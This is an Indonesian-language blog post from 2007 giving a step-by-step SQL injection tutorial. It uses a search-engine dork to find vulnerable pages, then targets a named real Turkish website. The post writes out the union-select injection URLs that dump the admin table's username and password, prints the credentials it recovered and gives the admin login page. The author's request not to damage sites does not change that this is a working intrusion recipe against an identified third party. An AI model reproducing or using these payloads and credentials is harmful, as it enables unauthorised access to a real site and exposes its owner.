<< Newer Post
Older Post >>

Dolanan SQL Inject..  

Thursday, August 16, 2007

Gag tau mungkin ini jawaban dari beberapa pertanyaan teman sy yg msh ingin coba-coba
dengan SQL Inject. ya sekedar belajar dan latihan sambil nyari-nyari yg berguna bagi diri sendiri and my big family :)

Ada banyak artikel di Internet yg memberikan informasi bagaimana cara meng-exploitasi situs-situs yang vulnerability, tp terkadang bagi sebagian orang yg mendapatkannya malah bingung cara penerapannya. hmmm..ini sekedar contoh saja, tp sy berharap tidak dilakukan
untuk kemaksiatan (dosa ditangan anda).

ok kita mulai :

Step 1 :
cari target di Internet dengan menggunakan search engine, masukkan keyword yg tepat misal
inurl:/devami.asp?id= geri

Step 2 :
ketemu korbannya ! sy pilih salah satu korban : http://www.istanbulplanlama.com/vz/devami.asp?id=21

Step 3 :
selanjutnya sy coba untuk membuktikan bahwa url tersebut masih vul or not dengan cara menghapus angka 21-nya. yupz, ternyata saya dapat 1 pesan error seperti ini :



Step 4 :
dari hasil diatas, selanjutnya siapkan kue + teh maniz :)

Step 5 :

untuk mencari username coba query dibawah ini : -21+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

ganti angka 21 diatas dengan query tersebut, sehingga menjadi :

http://www.istanbulplanlama.com/vz/devami.asp?id=
-21+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin (ditulis sebaris...)

dari query diatas sy dapatkan username nya adalah : istanbul

Step 6 :
jika username sudah dapat, selanjutnya password. input query seperti ini :

-21+union+select+0,sifre,2,3,4,5,6,7+from+admin

contoh :

http://www.istanbulplanlama.com/vz/devami.asp?
id=-21+union+select+0,sifre,2,3,4,5,6,7+from+admin (ditulis sebaris...)

binggo....! passwordnya di dapat : emelsevil96572

Step 7 :
login dengan menggunakan username dan password tersebut dengan cara masuk ke halaman admin : http://www.istanbulplanlama.com/vz/admin/kontrol.asp

Step 8 :
terserah sekarang mau ngapain yg penting, jangan pernah rusakin site punya orang. Ingat dosa !

Step 9 :
pulang shalat tahajud n mboco Qur'an

Catatan :
buat om y***o dan om b*b mudah-mudahan ini jadi step tuk belajar sec networking :)

Posted in , , by Dany K

3 comments: to “ Dolanan SQL Inject..

Post a Comment

Subscribe to: Post Comments (Atom)
Subscribe in Bloglines Subscribe in NewsGator Online Add Celoteh Dany... to Newsburst from CNET News.com Subscribe in Rojo Add to Google